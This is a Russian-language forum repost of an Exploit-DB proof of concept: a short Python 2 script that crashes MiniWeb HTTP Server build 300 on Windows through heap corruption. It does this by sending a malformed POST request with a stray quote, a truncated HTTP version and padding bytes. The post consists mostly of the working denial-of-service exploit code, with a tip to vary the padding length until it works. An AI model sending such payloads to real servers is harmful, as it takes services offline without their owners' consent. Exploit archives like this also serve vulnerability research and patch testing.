Exploit MiniWeb HTTP Server 300 - Crash (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25418
Проверка EDB
  1. Пройдено
Автор
DMNT
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2013-05-13
Код:
# MiniWeb HTTP server (build 300, built on Feb 28 2013) by Stanley Huang
# http://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Heap corruption PoC - remote DoS
# Tested on Win7 SP1 RUS
# (x) dmnt 2013

import socket

print 'Mini Web HTTP Server remote DoS exploit by dmnt\n'
host = "127.0.0.1"
port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print 'Connect to host and send payload\n'
stuff = 'POST /'+'"' +' HTTP/1.\r\n'
stuff+= 'Content-Type: application/x-www-form-urlencoded\r\n'
stuff+= 'Content-Length: 0\r\n\r\n'
stuff+= 'A'*15
s.send(stuff)
print 'Server crashed\n'

# Exploit-DB note:
# Tinker with the amount of As to get this to work
 
Источник
www.exploit-db.com

Похожие темы